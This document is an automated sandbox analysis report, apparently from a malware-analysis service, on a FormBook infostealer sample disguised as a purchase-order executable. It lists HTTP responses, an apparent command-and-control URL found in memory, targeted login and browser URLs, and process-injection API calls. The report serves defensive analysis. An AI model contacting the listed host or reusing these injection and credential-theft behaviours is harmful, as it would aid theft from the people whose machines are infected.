Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 06 Jan 2025 17:09:24 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 06 Jan 2025 17:09:28 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 06 Jan 2025 17:09:31 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 06 Jan 2025 17:09:34 GMTContent-Type: text/htmlContent-Length: 0Connection: close

Source: RAVCpl64.exe, 00000002.00000002.23288253460.0000000003396000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.investshares.net
Source: RAVCpl64.exe, 00000002.00000002.23288253460.0000000003396000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.investshares.net/cf9p/
Source: fc.exe, 00000003.00000002.23287225942.00000000082D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: fc.exe, 00000003.00000002.23287225942.00000000082D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 17O3k-2I.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: fc.exe, 00000003.00000003.22611963148.0000000008345000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000003.00000002.23287225942.00000000082D7000.00000004.00000020.00020000.00000000.sdmp, 17O3k-2I.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 17O3k-2I.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RAVCpl64.exe, 00000002.00000002.23294261795.000000000694C000.00000004.80000000.00040000.00000000.sdmp, fc.exe, 00000003.00000002.23286204732.000000000490C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: fc.exe, 00000003.00000002.23287225942.00000000082D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: fc.exe, 00000003.00000003.22603085140.000000000328D000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000003.00000003.22603085140.0000000003297000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000003.00000003.22607028047.00000000032B3000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000003.00000002.23284109384.00000000032B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: fc.exe, 00000003.00000003.22603085140.0000000003297000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000003.00000003.22607028047.00000000032B3000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000003.00000002.23284109384.00000000032B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: fc.exe, 00000003.00000003.22603085140.0000000003297000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: fc.exe, 00000003.00000003.22603085140.0000000003297000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000003.00000003.22607028047.00000000032B3000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000003.00000002.23284109384.00000000032B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: fc.exe, 00000003.00000002.23284109384.000000000324B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
Source: fc.exe, 00000003.00000002.23284109384.0000000003278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
Source: fc.exe, 00000003.00000003.22602188721.0000000008277000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
Source: fc.exe, 00000003.00000003.22611963148.0000000008345000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000003.00000002.23287225942.00000000082D7000.00000004.00000020.00020000.00000000.sdmp, 17O3k-2I.3.dr	String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: fc.exe, 00000003.00000003.22611963148.0000000008345000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000003.00000002.23287225942.00000000082D7000.00000004.00000020.00020000.00000000.sdmp, 17O3k-2I.3.dr	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: fc.exe, 00000003.00000002.23287225942.00000000082D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: fc.exe, 00000003.00000003.22611963148.0000000008345000.00000004.00000020.00020000.00000000.sdmp, 17O3k-2I.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 0.2.PO_62401394_MITech_20250601.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.23285133806.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.23283972486.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.23285045111.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.22426186496.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: PO_62401394_MITech_20250601.exe

Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00C4CB43 NtClose,	0_2_00C4CB43
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042B90 NtFreeVirtualMemory,LdrInitializeThunk,	0_2_01042B90
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042BC0 NtQueryInformationToken,LdrInitializeThunk,	0_2_01042BC0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042A80 NtClose,LdrInitializeThunk,	0_2_01042A80
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042D10 NtQuerySystemInformation,LdrInitializeThunk,	0_2_01042D10
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042EB0 NtProtectVirtualMemory,LdrInitializeThunk,	0_2_01042EB0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010434E0 NtCreateMutant,LdrInitializeThunk,	0_2_010434E0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01044260 NtSetContextThread,	0_2_01044260
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01044570 NtSuspendThread,	0_2_01044570
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010429D0 NtWaitForSingleObject,	0_2_010429D0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010429F0 NtReadFile,	0_2_010429F0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042B00 NtQueryValueKey,	0_2_01042B00
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042B10 NtAllocateVirtualMemory,	0_2_01042B10
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042B20 NtQueryInformationProcess,	0_2_01042B20
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042B80 NtCreateKey,	0_2_01042B80
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042BE0 NtQueryVirtualMemory,	0_2_01042BE0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042A10 NtWriteFile,	0_2_01042A10
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042AA0 NtQueryInformationFile,	0_2_01042AA0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042AC0 NtEnumerateValueKey,	0_2_01042AC0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042D50 NtWriteVirtualMemory,	0_2_01042D50
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042DA0 NtReadVirtualMemory,	0_2_01042DA0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042DC0 NtAdjustPrivilegesToken,	0_2_01042DC0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042C10 NtOpenProcess,	0_2_01042C10
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042C20 NtSetInformationFile,	0_2_01042C20
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042C30 NtMapViewOfSection,	0_2_01042C30
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042C50 NtUnmapViewOfSection,	0_2_01042C50
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042CD0 NtEnumerateKey,	0_2_01042CD0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042CF0 NtDelayExecution,	0_2_01042CF0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042F00 NtCreateFile,	0_2_01042F00
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042F30 NtOpenDirectoryObject,	0_2_01042F30
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042FB0 NtSetValueKey,	0_2_01042FB0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042E00 NtQueueApcThread,	0_2_01042E00
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042E50 NtCreateSection,	0_2_01042E50
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042E80 NtCreateProcessEx,	0_2_01042E80
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042EC0 NtQuerySection,	0_2_01042EC0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042ED0 NtResumeThread,	0_2_01042ED0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010438D0 NtGetContextThread,	0_2_010438D0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01043C30 NtOpenProcessToken,	0_2_01043C30
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01043C90 NtOpenThread,	0_2_01043C90
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00EC35C9 NtSetContextThread,	0_2_00EC35C9
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00EC38F2 NtSuspendThread,	0_2_00EC38F2
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00EC3C0B NtResumeThread,	0_2_00EC3C0B
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922B90 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_03922B90
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922B80 NtCreateKey,LdrInitializeThunk,	3_2_03922B80
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922BC0 NtQueryInformationToken,LdrInitializeThunk,	3_2_03922BC0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922B10 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_03922B10
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922B00 NtQueryValueKey,LdrInitializeThunk,	3_2_03922B00
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922A80 NtClose,LdrInitializeThunk,	3_2_03922A80
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922AC0 NtEnumerateValueKey,LdrInitializeThunk,	3_2_03922AC0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922A10 NtWriteFile,LdrInitializeThunk,	3_2_03922A10
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039229F0 NtReadFile,LdrInitializeThunk,	3_2_039229F0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922F00 NtCreateFile,LdrInitializeThunk,	3_2_03922F00
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922E50 NtCreateSection,LdrInitializeThunk,	3_2_03922E50
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922D10 NtQuerySystemInformation,LdrInitializeThunk,	3_2_03922D10
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922CF0 NtDelayExecution,LdrInitializeThunk,	3_2_03922CF0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922C30 NtMapViewOfSection,LdrInitializeThunk,	3_2_03922C30
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039234E0 NtCreateMutant,LdrInitializeThunk,	3_2_039234E0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03924260 NtSetContextThread,	3_2_03924260
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03924570 NtSuspendThread,	3_2_03924570
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922BE0 NtQueryVirtualMemory,	3_2_03922BE0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922B20 NtQueryInformationProcess,	3_2_03922B20
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922AA0 NtQueryInformationFile,	3_2_03922AA0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039229D0 NtWaitForSingleObject,	3_2_039229D0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922FB0 NtSetValueKey,	3_2_03922FB0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922F30 NtOpenDirectoryObject,	3_2_03922F30
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922E80 NtCreateProcessEx,	3_2_03922E80
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922EB0 NtProtectVirtualMemory,	3_2_03922EB0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922ED0 NtResumeThread,	3_2_03922ED0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922EC0 NtQuerySection,	3_2_03922EC0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922E00 NtQueueApcThread,	3_2_03922E00
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922DA0 NtReadVirtualMemory,	3_2_03922DA0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922DC0 NtAdjustPrivilegesToken,	3_2_03922DC0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922D50 NtWriteVirtualMemory,	3_2_03922D50
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922CD0 NtEnumerateKey,	3_2_03922CD0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922C10 NtOpenProcess,	3_2_03922C10
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922C20 NtSetInformationFile,	3_2_03922C20
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03922C50 NtUnmapViewOfSection,	3_2_03922C50
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_039238D0 NtGetContextThread,	3_2_039238D0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03923C90 NtOpenThread,	3_2_03923C90
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_03923C30 NtOpenProcessToken,	3_2_03923C30
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_030C93B0 NtCreateFile,	3_2_030C93B0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_030C9610 NtDeleteFile,	3_2_030C9610
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_030C96B0 NtClose,	3_2_030C96B0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_030C9520 NtReadFile,	3_2_030C9520
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_030C9820 NtAllocateVirtualMemory,	3_2_030C9820
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_037B4628 NtMapViewOfSection,	3_2_037B4628
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_037B35C9 NtSetContextThread,	3_2_037B35C9
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_037B49F1 NtUnmapViewOfSection,	3_2_037B49F1
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_037B38F2 NtSuspendThread,	3_2_037B38F2
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_037B3F29 NtQueueApcThread,	3_2_037B3F29
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_037B3C0B NtResumeThread,	3_2_037B3C0B

Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00C21B91	0_2_00C21B91
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00C38B13	0_2_00C38B13
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00C228C0	0_2_00C228C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00C228BC	0_2_00C228BC
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00C21000	0_2_00C21000
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00C4F163	0_2_00C4F163
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00C23205	0_2_00C23205
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00C23210	0_2_00C23210
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00C30313	0_2_00C30313
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00C36D0E	0_2_00C36D0E
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00C36D13	0_2_00C36D13
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00C2E512	0_2_00C2E512
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00C2E513	0_2_00C2E513
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00C30533	0_2_00C30533
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00C2E657	0_2_00C2E657
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00C2E663	0_2_00C2E663
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00C2467A	0_2_00C2467A
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010D010E	0_2_010D010E
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010BE076	0_2_010BE076
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010000A0	0_2_010000A0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101E310	0_2_0101E310
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FD2245	0_2_00FD2245
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01010445	0_2_01010445
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010C6757	0_2_010C6757
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101A760	0_2_0101A760
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01012760	0_2_01012760
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01034670	0_2_01034670
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100C6E0	0_2_0100C6E0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FF6868	0_2_00FF6868
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100E9A0	0_2_0100E9A0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010CE9A6	0_2_010CE9A6
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103E810	0_2_0103E810
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01026882	0_2_01026882
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010128C0	0_2_010128C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01010B10	0_2_01010B10
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01084BC0	0_2_01084BC0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010CCA13	0_2_010CCA13
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010CEA5B	0_2_010CEA5B
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010B2AC0	0_2_010B2AC0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100AD00	0_2_0100AD00
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01010D69	0_2_01010D69
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01022DB0	0_2_01022DB0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01000C12	0_2_01000C12
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101AC20	0_2_0101AC20
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0108EC20	0_2_0108EC20
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010BEC4C	0_2_010BEC4C
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010C6C69	0_2_010C6C69
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010CEC60	0_2_010CEC60
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01028CDF	0_2_01028CDF
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101CF00	0_2_0101CF00
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010CEFBF	0_2_010CEFBF
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01052E48	0_2_01052E48
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01030E50	0_2_01030E50
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010B0E6D	0_2_010B0E6D
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010C0EAD	0_2_010C0EAD
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01002EE8	0_2_01002EE8
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010AD130	0_2_010AD130
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0105717A	0_2_0105717A
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010151C0	0_2_010151C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102B1E0	0_2_0102B1E0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0104508C	0_2_0104508C
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101B0D0	0_2_0101B0D0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFF113	0_2_00FFF113
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010C70F1	0_2_010C70F1
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFD2EC	0_2_00FFD2EC
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010CF330	0_2_010CF330
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01001380	0_2_01001380
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102D210	0_2_0102D210
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010C124C	0_2_010C124C
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010CF5C9	0_2_010CF5C9
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010C75C6	0_2_010C75C6
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107D480	0_2_0107D480
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A5490	0_2_010A5490
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100170C	0_2_0100170C
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010AD62C	0_2_010AD62C
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010B1623	0_2_010B1623
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010BD646	0_2_010BD646
